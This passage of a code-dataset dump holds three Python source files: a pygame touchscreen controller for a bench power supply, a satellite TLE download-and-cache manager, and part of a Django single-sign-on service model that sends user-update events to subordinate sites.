+{"seq_id": "71679802087", "text": "#!/usr/bin/env python\nimport time\nimport serial\n\nimport pygame\n\nfrom pygame.locals import *\nfrom ui import widgets, surface\nimport psu\n\nimport random\n\n\nclass PresetScreen(object):\n def __init__(self, display, psu, parent):\n self.display = display\n self.parent = parent\n self.psu = psu\n self.active = False\n\n self.screen = widgets.Pannel(display)\n\n frame = self.screen.addWidget(widgets.Frame,\n \"Select preset\", 2, 2, 318, 238)\n\n frame.addWidget(widgets.Button, \"3.3 / -3.3\", 2, 2, 120, 40,\n self.setPreset(3300))\n frame.addWidget(widgets.Button, \"5 / -5\", 2, 47, 120, 40,\n self.setPreset(5000))\n frame.addWidget(widgets.Button, \"9 / -9\", 2, 92, 120, 40,\n self.setPreset(9000))\n frame.addWidget(widgets.Button, \"12 / -12\", 2, 137, 120, 40,\n self.setPreset(12000))\n frame.addWidget(widgets.Button, \"15 / -15\", 2, 182, 120, 40,\n self.setPreset(15000))\n\n self.screen.addWidget(widgets.Button, \"Cancel\", 230, 190, 80, 40, self.cancel)\n\n def setVoltage(self, voltage):\n self.active = False\n self.psu.setVoltage(1, voltage)\n self.psu.setVoltage(2, -1 * voltage)\n\n def setPreset(self, voltage):\n return lambda: self.setVoltage(voltage)\n\n def cancel(self):\n self.active = False\n\n def activate(self):\n self.active = True\n self.display.clear()\n self.screen.draw()\n self.mainLoop()\n\n def mainLoop(self):\n while self.active:\n self.screen.update()\n\n self.parent.clock.tick(40)\n\n for event in pygame.event.get():\n if event.type in (QUIT, KEYDOWN):\n self.active = False\n\n self.screen.sendEvent(event)\n self.parent.activate()\n\n\nclass ConfigScreen(object):\n def __init__(self, display, psu, channel, parent, negative=False):\n self.display = display\n self.channel = channel\n self.parent = parent\n self.psu = psu\n self.active = False\n self.negative = negative\n\n self.screen = widgets.Pannel(display)\n\n frame = self.screen.addWidget(widgets.Frame,\n \"Voltage\", 2, 2, 150, 155)\n self.vdisp = frame.addWidget(widgets.SevenSegment, 5, 37, 143, 60,\n digits=3, msd=2, colour=widgets.Colours.electric_blue)\n \n bw = 28\n frame.addWidget(widgets.UpButton, 59, 4, bw, bw, self.setVDisp(1),\n colour=widgets.Colours.electric_blue)\n frame.addWidget(widgets.UpButton, 106, 4, bw, bw, self.setVDisp(0.1),\n colour=widgets.Colours.electric_blue)\n frame.addWidget(widgets.DownButton, 59, 100, bw, bw, self.setVDisp(-1),\n colour=widgets.Colours.electric_blue)\n frame.addWidget(widgets.DownButton, 106, 100, bw, bw, self.setVDisp(-0.1),\n colour=widgets.Colours.electric_blue)\n\n cframe = self.screen.addWidget(widgets.Frame,\n \"Current\", 162, 2, 150, 155)\n self.cdisp = cframe.addWidget(widgets.SevenSegment, 5, 37, 143, 60,\n digits=3, msd=1, colour=widgets.Colours.electric_blue)\n\n cframe.addWidget(widgets.UpButton, 12, 4, bw, bw, self.setCDisp(1),\n colour=widgets.Colours.electric_blue)\n cframe.addWidget(widgets.UpButton, 59, 4, bw, bw, self.setCDisp(0.1),\n colour=widgets.Colours.electric_blue)\n cframe.addWidget(widgets.UpButton, 106, 4, bw, bw, self.setCDisp(0.01),\n colour=widgets.Colours.electric_blue)\n\n cframe.addWidget(widgets.DownButton, 12, 100, bw, bw, self.setCDisp(-1),\n colour=widgets.Colours.electric_blue)\n cframe.addWidget(widgets.DownButton, 59, 100, bw, bw, self.setCDisp(-0.1),\n colour=widgets.Colours.electric_blue)\n cframe.addWidget(widgets.DownButton, 106, 100, bw, bw, self.setCDisp(-0.01),\n colour=widgets.Colours.electric_blue)\n\n self.screen.addWidget(widgets.Button, \"Save\", 140, 190, 80, 40, 
self.save)\n self.screen.addWidget(widgets.Button, \"Cancel\", 230, 190, 80, 40, self.cancel)\n\n def setMax(self, disp, inc, mx):\n disp.value += inc\n\n if disp.value > mx:\n disp.value = mx\n if disp.value < 0:\n disp.value = 0\n\n def save(self):\n self.psu.setCurrent(self.channel, int(self.cdisp.value*1000))\n self.psu.setVoltage(self.channel, int(self.vdisp.value*1000))\n self.active = False\n\n def cancel(self):\n self.active = False\n\n def setVDisp(self, inc):\n return lambda: self.setMax(self.vdisp, inc, 15) \n\n def setCDisp(self, inc):\n return lambda: self.setMax(self.cdisp, inc, 1.5) \n\n def activate(self):\n self.vdisp.value = self.psu.vset[self.channel - 1]/1000.0\n self.cdisp.value = self.psu.cset[self.channel - 1]/1000.0\n self.active = True\n self.display.clear()\n self.screen.draw()\n self.mainLoop()\n\n def mainLoop(self):\n while self.active:\n self.screen.update()\n\n self.parent.clock.tick(40)\n\n for event in pygame.event.get():\n if event.type in (QUIT, KEYDOWN):\n self.active = False\n\n self.screen.sendEvent(event)\n self.parent.activate()\n\nclass PowerSupply(object):\n def __init__(self, display, ser):\n self.display = display\n self.psu = psu.PSU(ser)\n self.maxV = 16\n\n self.mainScreen = widgets.Pannel(display)\n self.configScreen1 = ConfigScreen(display, self.psu, 1, self)\n self.configScreen2 = ConfigScreen(display, self.psu, 2, self, True)\n self.presetScreen = PresetScreen(display, self.psu, self)\n\n self.screen = self.mainScreen\n\n self.mainScreen.addWidget(widgets.Button, \"Presets\", 225, 138, 90, 40,\n callback=self.openPresets)\n\n self.ite = self.mainScreen.addWidget(widgets.ToggleButton, \"Main On\",\n \"Main Off\", 225, 190, 90, 40, callback=self.togglePower)\n\n # Channel 1\n ch1 = self.mainScreen.addWidget(widgets.Frame, \"Channel 1\", 1, 1, 220, 110)\n self.posv = ch1.addWidget(widgets.FancyGauge,\n 1, 3, 40,\n units=\"Volts\",\n colour=widgets.Colours.electric_blue,\n valueFormat=\"%.2f\",\n maxScale=self.maxV\n )\n self.posc = ch1.addWidget(widgets.FancyGauge,\n 85, 3, 40,\n units=\"Amps\",\n colour=widgets.Colours.electric_blue,\n valueFormat=\"%.2f\",\n maxScale=self.maxV\n )\n ch1.addWidget(widgets.Button, \"Setup\", 172, 52, 40, 30,\n callback=self.btnConfig1)\n\n # Channel 2\n ch2 = self.mainScreen.addWidget(widgets.Frame, \"Channel 2\", 1, 120, 220, 110)\n self.negv = ch2.addWidget(widgets.FancyGauge,\n 1, 3, 40,\n units=\"Volts\",\n colour=widgets.Colours.electric_blue,\n valueFormat=\"-%.2f\",\n maxScale=self.maxV\n )\n self.negc = ch2.addWidget(widgets.FancyGauge,\n 85, 3, 40,\n units=\"Amps\",\n colour=widgets.Colours.electric_blue,\n valueFormat=\"%.2f\",\n maxScale=self.maxV\n )\n ch2.addWidget(widgets.Button, \"Setup\", 172, 52, 40, 30,\n callback=self.btnConfig2)\n\n # PDU frame\n pdu = self.mainScreen.addWidget(widgets.Frame, \"PDU\", 225, 1, 90, 110)\n\n # Toggle buttons \n self.toggle_widgets = [\n ch1.addWidget(widgets.ToggleButton,\n \"On\", \"Off\", 172, 10, 40, 30, callback=self.btnEn1),\n ch2.addWidget(widgets.ToggleButton,\n \"On\", \"Off\", 172, 10, 40, 30, callback=self.btnEn2),\n pdu.addWidget(widgets.ToggleButton,\n \"AC 1\", \"AC 1\", 10, 10, 30, 30, callback=self.btnAc1),\n pdu.addWidget(widgets.ToggleButton,\n \"AC 2\", \"AC 2\", 50, 10, 30, 30, callback=self.btnAc2),\n pdu.addWidget(widgets.ToggleButton,\n \"AC 3\", \"AC 3\", 10, 50, 30, 30, callback=self.btnAc3),\n pdu.addWidget(widgets.ToggleButton,\n \"AC 4\", \"AC 4\", 50, 50, 30, 30, callback=self.btnAc4),\n ]\n\n self.clock = pygame.time.Clock()\n 
self.c = time.time()\n self.long_c = time.time()\n self.active = False\n\n self.ncvals = []\n self.pcvals = []\n\n self.activate()\n\n def activate(self):\n self.display.clear()\n self.mainScreen.draw()\n if not self.active:\n self.active = True\n self.mainLoop()\n\n def togglePower(self, state):\n self.psu.toggleInput(state)\n\n def openPresets(self):\n self.presetScreen.activate()\n\n def btnConfig1(self):\n self.configScreen1.activate()\n\n def btnConfig2(self):\n self.configScreen2.activate()\n\n def btnEn1(self, state):\n if not state:\n self.psu.outputEnable(1)\n else:\n self.psu.outputDisable(1)\n\n def btnEn2(self, state):\n if not state:\n self.psu.outputEnable(2)\n else:\n self.psu.outputDisable(2)\n\n def btnAc1(self, state):\n if state:\n self.psu.acEnable(1)\n else:\n self.psu.acDisable(1)\n\n def btnAc2(self, state):\n if state:\n self.psu.acEnable(2)\n else:\n self.psu.acDisable(2)\n\n def btnAc3(self, state):\n if state:\n self.psu.acEnable(3)\n else:\n self.psu.acDisable(3)\n\n def btnAc4(self, state):\n if state:\n self.psu.acEnable(4)\n else:\n self.psu.acDisable(4)\n\n def tick(self):\n self.psu.tick()\n\n def slowTick(self):\n self.psu.updateState()\n self.ite.setState(self.psu.transformer)\n self.posv.value = self.psu.voltageP/1000.0\n if self.psu.currentP >= 0:\n self.pcvals.append(self.psu.currentP/1000.0)\n self.posc.value = max(self.pcvals)\n if len(self.pcvals) > 5:\n self.pcvals.pop(0)\n \n self.negv.value = -1*(self.psu.voltageN/1000.0)\n\n if self.psu.currentN >= 0:\n self.ncvals.append(self.psu.currentN/1000.0)\n self.negc.value = max(self.ncvals)\n if len(self.ncvals) > 5:\n self.ncvals.pop(0)\n\n q = False\n\n for i, w in enumerate(self.toggle_widgets):\n q = q or w.setState(self.psu.state_ar[i])\n\n if q:\n self.mainScreen.display.flip()\n\n def mainLoop(self):\n while self.active:\n self.mainScreen.update()\n\n if (time.time() - self.c > 0.02):\n self.c = time.time()\n self.tick()\n\n if (time.time() - self.long_c > 0.3):\n self.long_c = time.time()\n self.slowTick()\n\n self.clock.tick(40)\n\n for event in pygame.event.get():\n if event.type in (QUIT, KEYDOWN):\n self.active = False\n\n self.mainScreen.sendEvent(event)\n\nif __name__ == '__main__': \n ser = serial.Serial('/dev/serial0', 57600)\n #ser = psu.FakePSU(None, None)\n mypsu = PowerSupply(surface.TouchScreen(), ser)\n #mypsu = PowerSupply(surface.Dev(), ser)\n mypsu.activate()\n", "repo_name": "calston/piwerlab", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 11450, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "ui.widgets.Pannel", "line_number": 21, "usage_type": "call"}, {"api_name": "ui.widgets", "line_number": 21, "usage_type": "name"}, {"api_name": "ui.widgets.Frame", "line_number": 23, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 23, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 26, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 26, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 28, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 28, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 30, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 30, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 32, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 32, "usage_type": 
"name"}, {"api_name": "ui.widgets.Button", "line_number": 34, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 34, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 37, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 37, "usage_type": "name"}, {"api_name": "pygame.event.get", "line_number": 62, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 62, "usage_type": "attribute"}, {"api_name": "ui.widgets.Pannel", "line_number": 79, "usage_type": "call"}, {"api_name": "ui.widgets", "line_number": 79, "usage_type": "name"}, {"api_name": "ui.widgets.Frame", "line_number": 81, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 81, "usage_type": "name"}, {"api_name": "ui.widgets.SevenSegment", "line_number": 83, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 83, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 84, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 84, "usage_type": "name"}, {"api_name": "ui.widgets.UpButton", "line_number": 87, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 87, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 88, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 88, "usage_type": "name"}, {"api_name": "ui.widgets.UpButton", "line_number": 89, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 89, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 90, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 90, "usage_type": "name"}, {"api_name": "ui.widgets.DownButton", "line_number": 91, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 91, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 92, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 92, "usage_type": "name"}, {"api_name": "ui.widgets.DownButton", "line_number": 93, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 93, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 94, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 94, "usage_type": "name"}, {"api_name": "ui.widgets.Frame", "line_number": 96, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 96, "usage_type": "name"}, {"api_name": "ui.widgets.SevenSegment", "line_number": 98, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 98, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 99, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 99, "usage_type": "name"}, {"api_name": "ui.widgets.UpButton", "line_number": 101, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 101, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 102, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 102, "usage_type": "name"}, {"api_name": "ui.widgets.UpButton", "line_number": 103, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 103, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 104, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 104, "usage_type": "name"}, {"api_name": "ui.widgets.UpButton", "line_number": 105, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 105, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 
106, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 106, "usage_type": "name"}, {"api_name": "ui.widgets.DownButton", "line_number": 108, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 108, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 109, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 109, "usage_type": "name"}, {"api_name": "ui.widgets.DownButton", "line_number": 110, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 110, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 111, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 111, "usage_type": "name"}, {"api_name": "ui.widgets.DownButton", "line_number": 112, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 112, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 113, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 113, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 115, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 115, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 116, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 116, "usage_type": "name"}, {"api_name": "pygame.event.get", "line_number": 154, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 154, "usage_type": "attribute"}, {"api_name": "psu.PSU", "line_number": 164, "usage_type": "call"}, {"api_name": "ui.widgets.Pannel", "line_number": 167, "usage_type": "call"}, {"api_name": "ui.widgets", "line_number": 167, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 174, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 174, "usage_type": "name"}, {"api_name": "ui.widgets.ToggleButton", "line_number": 177, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 177, "usage_type": "name"}, {"api_name": "ui.widgets.Frame", "line_number": 181, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 181, "usage_type": "name"}, {"api_name": "ui.widgets.FancyGauge", "line_number": 182, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 182, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 185, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 185, "usage_type": "name"}, {"api_name": "ui.widgets.FancyGauge", "line_number": 189, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 189, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 192, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 192, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 196, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 196, "usage_type": "name"}, {"api_name": "ui.widgets.Frame", "line_number": 200, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 200, "usage_type": "name"}, {"api_name": "ui.widgets.FancyGauge", "line_number": 201, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 201, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 204, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 204, "usage_type": "name"}, {"api_name": "ui.widgets.FancyGauge", "line_number": 208, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 208, "usage_type": "name"}, 
{"api_name": "ui.widgets.Colours", "line_number": 211, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 211, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 215, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 215, "usage_type": "name"}, {"api_name": "ui.widgets.Frame", "line_number": 219, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 219, "usage_type": "name"}, {"api_name": "ui.widgets.ToggleButton", "line_number": 223, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 223, "usage_type": "name"}, {"api_name": "ui.widgets.ToggleButton", "line_number": 225, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 225, "usage_type": "name"}, {"api_name": "ui.widgets.ToggleButton", "line_number": 227, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 227, "usage_type": "name"}, {"api_name": "ui.widgets.ToggleButton", "line_number": 229, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 229, "usage_type": "name"}, {"api_name": "ui.widgets.ToggleButton", "line_number": 231, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 231, "usage_type": "name"}, {"api_name": "ui.widgets.ToggleButton", "line_number": 233, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 233, "usage_type": "name"}, {"api_name": "pygame.time.Clock", "line_number": 237, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 237, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 238, "usage_type": "call"}, {"api_name": "time.time", "line_number": 239, "usage_type": "call"}, {"api_name": "time.time", "line_number": 335, "usage_type": "call"}, {"api_name": "time.time", "line_number": 336, "usage_type": "call"}, {"api_name": "time.time", "line_number": 339, "usage_type": "call"}, {"api_name": "time.time", "line_number": 340, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 345, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 345, "usage_type": "attribute"}, {"api_name": "serial.Serial", "line_number": 352, "usage_type": "call"}, {"api_name": "ui.surface.TouchScreen", "line_number": 354, "usage_type": "call"}, {"api_name": "ui.surface", "line_number": 354, "usage_type": "name"}]}
+{"seq_id": "16203859230", "text": "#!/usr/bin/env python3\n\n'''\ntlemanager.py\n2018-11-19\njonathanwesleystone+KI5BEX@gmail.com\n\nLoad and keep updated the local TLE database.\n'''\n\nimport json\n\nfrom datetime import datetime, timezone\n\nimport requests\n\nfrom skyfield.functions import BytesIO\nfrom skyfield.iokit import parse_tle\n\nclass TleManager:\n '''Keep the TLE files updated.\n '''\n\n def __init__(self, tlesrcfile=None, tledbcurrent=None, tledbhistory=None):\n '''load up a birdlist annotated with TLE sources\n\n :param tlesrcfile: JSON file linking the birds to their TLEs\n :param tledb: JSON file containing the downloaded TLE logs and history\n '''\n\n self.tlesrcfile = 'data/tle/choice_birds.json' if tlesrcfile is None else tlesrcfile\n self.tledbcurrent = 'tledbcurrent.json' if tledbcurrent is None else tledbcurrent\n self.tledbhistory = 'tledbhistory.json' if tledbhistory is None else tledbhistory\n\n try:\n with open(self.tlesrcfile, 'r') as fin:\n self.tlesrcs = json.load(fin)\n except FileNotFoundError:\n self.tlesrcs = {\n 'sources': []\n }\n\n self.tle = self.load()\n # this has the tle with our aliases\n self.tlestring = '\\n'.join([key + '\\n' + value.replace('n', '-') for key, value in self.tle.items()])\n self.bird = self.parse()\n\n def parse(self):\n '''Parse the loaded tle data using SkyField API.\n '''\n tle = {}\n for names, sat in parse_tle(BytesIO(bytes(self.tlestring, 'ascii'))):\n tle[sat.model.satnum] = sat\n for name in names:\n tle[name] = sat\n\n return tle\n\n def load(self):\n '''load the current tle data into a dict of {bird_alias: 'tle\\nlines'}\n '''\n\n try:\n with open(self.tledbcurrent, 'r') as fin:\n tledbcurrent = json.load(fin)\n except FileNotFoundError:\n tledbcurrent = {\n 'sources': []\n }\n\n bird_tles = {}\n for source in self.tlesrcs['sources']:\n if source in tledbcurrent:\n lines = tledbcurrent[source]['body'].splitlines()\n for birdname, bird in self.tlesrcs['birds'].items():\n if 'source' in bird and bird['source'] == source:\n lineiter = iter(lines)\n for line in lineiter:\n if bird['name'] == line.strip():\n bird_tles[birdname] = ((birdname + (' ' * 24))[:24]) + \\\n '\\n' + next(lineiter) + '\\n' + next(lineiter)\n break\n\n return bird_tles\n\n def update(self, keep_history=True):\n '''update the tles if needed\n '''\n try:\n with open(self.tledbcurrent, 'r') as fin:\n tledbcurrent = json.load(fin)\n except FileNotFoundError:\n tledbcurrent = {}\n\n try:\n with open(self.tledbhistory, 'r') as fin:\n tledbhistory = json.load(fin)\n except FileNotFoundError:\n tledbhistory = {}\n\n for source in self.tlesrcs['sources']:\n wsrc = tledbcurrent.get(source, {})\n\n headers = {}\n if 'etag' in wsrc:\n headers['etag'] = wsrc['etag']\n if 'last-modified' in wsrc:\n headers['If-Modified-Since'] = wsrc['last-modified']\n\n response = requests.get(self.tlesrcs['sources'][source]['url'], headers=headers)\n\n now = datetime.now(timezone.utc).astimezone().isoformat()\n\n wsrc['checked'] = now\n wsrc['status'] = response.status_code\n\n if response.status_code == 200:\n wsrc['body'] = response.text\n wsrc['updated'] = now\n\n if 'etag' in response.headers:\n wsrc['etag'] = response.headers['etag']\n if 'last-modified' in response.headers:\n wsrc['last-modified'] = response.headers['last-modified']\n\n tledbcurrent[source] = wsrc\n\n if keep_history:\n tledbhistory[source] = tledbhistory.get(source, [])\n tledbhistory[source].append({\n 'when': now,\n 'status': response.status_code,\n 'text': response.text,\n 'etag': 
response.headers.get('etag'),\n 'last-modified': response.headers.get('last-modified')\n })\n\n with open(self.tledbcurrent, 'w') as fout:\n json.dump(tledbcurrent, fout)\n\n if keep_history:\n with open(self.tledbhistory, 'w') as fout:\n json.dump(tledbhistory, fout)\n\n def __getitem__(self, bird):\n '''Bird fetcher -- return SkyField Satellite object parsed from the TLE identified by bird.\n '''\n return self.bird[bird]\n\nclass TestTleManager(TleManager):\n '''Test wrapper for TleManager.\n '''\n\n def __init__(self):\n '''Call super with test arguments for convenience.\n '''\n super().__init__(None, 'data/test/tledbcurrent.json', 'data/test/tledbhistory.json')\n", "repo_name": "piratejon/birdplans", "sub_path": "birdplans/tlemanager.py", "file_name": "tlemanager.py", "file_ext": "py", "file_size_in_byte": 5197, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "json.load", "line_number": 37, "usage_type": "call"}, {"api_name": "skyfield.iokit.parse_tle", "line_number": 52, "usage_type": "call"}, {"api_name": "skyfield.functions.BytesIO", "line_number": 52, "usage_type": "call"}, {"api_name": "json.load", "line_number": 65, "usage_type": "call"}, {"api_name": "json.load", "line_number": 91, "usage_type": "call"}, {"api_name": "json.load", "line_number": 97, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 110, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 112, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 112, "usage_type": "name"}, {"api_name": "datetime.timezone.utc", "line_number": 112, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 112, "usage_type": "name"}, {"api_name": "json.dump", "line_number": 139, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 143, "usage_type": "call"}]}
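TleManager.update() above is doing HTTP cache revalidation: it stores the response validators and replays them on the next request, only overwriting the cached body on a 200. Note that the standard request header for replaying an ETag is If-None-Match; the code sends it under the literal name etag, which servers will generally ignore (If-Modified-Since, which it also sends, is the correct partner for Last-Modified). A minimal sketch of the conventional conditional-GET exchange, where the cache dict stands in for tledbcurrent.json:

import requests

cache = {}  # persisted to tledbcurrent.json in the real class

def fetch(url):
    headers = {}
    if 'etag' in cache:
        headers['If-None-Match'] = cache['etag']
    if 'last-modified' in cache:
        headers['If-Modified-Since'] = cache['last-modified']

    response = requests.get(url, headers=headers)
    if response.status_code == 304:
        return cache['body']  # not modified since the stored validators
    response.raise_for_status()

    cache['body'] = response.text
    if 'etag' in response.headers:
        cache['etag'] = response.headers['etag']
    if 'last-modified' in response.headers:
        cache['last-modified'] = response.headers['last-modified']
    return cache['body']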
+{"seq_id": "19973138297", "text": "import logging\nfrom inspect import ismethod, isfunction\nfrom typing import Union\n\nimport requests\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import models\nfrom django.db.models import QuerySet\nfrom django.db.models.base import ModelBase\nfrom django.utils.crypto import get_random_string\nfrom django.utils.translation import gettext_lazy as _\n\nfrom django_sso.exceptions import SSOException\nfrom django_sso.sso_gateway import Settings\n\nuser_model = get_user_model()\n\n\ndef service_token_generator():\n return get_random_string(Service.token.field.max_length)\n\n\nclass Service(models.Model):\n name = models.CharField(max_length=128, verbose_name=_('Name'))\n base_url = models.URLField(verbose_name=_('Base url'))\n enabled = models.BooleanField(default=False, verbose_name=_('Enabled'))\n token = models.CharField(max_length=128, verbose_name=_('Token'), unique=True, default=service_token_generator)\n\n def __str__(self):\n return self.base_url\n\n def _send_event(self, event_type, data):\n text = None\n fail = False\n\n if hasattr(settings, 'SSO_SUBORDINATE_COMMUNICATION_TIMEOUT'):\n timeout = settings.SSO_SUBORDINATE_COMMUNICATION_TIMEOUT\n\n assert type(settings.SSO_SUBORDINATE_COMMUNICATION_TIMEOUT) in (int, float)\n else:\n timeout = 0.1 # 100ms\n\n try:\n result = requests.post(\n f'{self.base_url}/sso/event/',\n json={\n 'type': event_type,\n 'token': self.token,\n **data\n },\n headers={\n \"Content-Type\": \"application/json\"\n },\n timeout=timeout\n )\n except Exception as e:\n logging.error(f\"Django SSO: {_('Failed to communicate with subordinated service')} {self.base_url}: {e}\")\n\n return\n\n try:\n assert result.status_code == 200, f\"{result.text}\"\n data = result.json()\n\n ok = not not (data['ok'] if 'ok' in data else False)\n\n if ok:\n return ok\n elif 'error' in data:\n raise Exception(f\"Django SSO: {_('Error raised on subordinate service')}: {data['error']}\")\n else:\n raise Exception(result.text)\n except Exception as e:\n logging.error(f'{_(\"Incorrect response from subordinated service\")}: STATUS={result.status_code}; TEXT={e}')\n\n return\n\n @staticmethod\n def build_update_user_event(user):\n \"\"\"\n Build event for accounts update on subbordinated services\n\n Args:\n user: AbstractBaseUser based classes are allowed\n \"\"\"\n event = {\n 'fields': {}\n }\n\n for field in ('is_active', 'is_staff', 'is_superuser'):\n if hasattr(user_model, field):\n event['fields'][field] = bool(getattr(user, field))\n\n event['fields'][\"user_identy\"] = getattr(user, user_model.USERNAME_FIELD)\n\n if hasattr(settings, 'SSO') and 'ADDITIONAL_FIELDS' in settings.SSO:\n for additional_field in settings.SSO['ADDITIONAL_FIELDS']:\n field_info = additional_field.split(':')\n alias = field_info[1] if len(field_info) == 2 else None\n\n result = user\n\n try:\n for prop in field_info[0].split('.'):\n try:\n value = getattr(result, prop)\n except ObjectDoesNotExist:\n value = None\n break\n\n if value != None:\n result = value\n else:\n result = None\n break\n\n if ismethod(result):\n result = result()\n elif isinstance(result, models.Model):\n if hasattr(result, 'to_sso_representation'):\n result = result.to_sso_representation()\n else:\n result = str(result)\n except Exception as e:\n logging.warning('Django SSO: failed to read value for field %s: %s' % (field_info[0], e))\n result = 
None\n\n event['fields'][alias if alias else additional_field] = result\n\n return event\n\n @staticmethod\n def build_update_fields_event(user_identities: Union[set, QuerySet], instance: ModelBase):\n \"\"\"\n Build event for fields update on subbordinated services. Fields of related model.\n\n Args:\n user_identities: QuerySet with users\n instance: An updated related model\n \"\"\"\n\n sso_settings = Settings()\n\n event = {\n \"fields\": {},\n \"user_identities\": (\n [*user_identities.values_list(get_user_model().USERNAME_FIELD, flat=True)]\n if isinstance(user_identities, QuerySet)\n else user_identities\n )\n }\n\n for field_info in sso_settings.affected_models_fields[instance.__class__]:\n field_info = field_info.split(':')\n field_alias = field_info[1] if len(field_info) == 2 else None\n field_path = field_info[0].split('.')\n field_name = field_alias if field_alias else field_info[0]\n\n if instance:\n if len(field_path) == 1:\n if hasattr(instance, 'to_sso_representation'):\n value = instance.to_sso_representation()\n 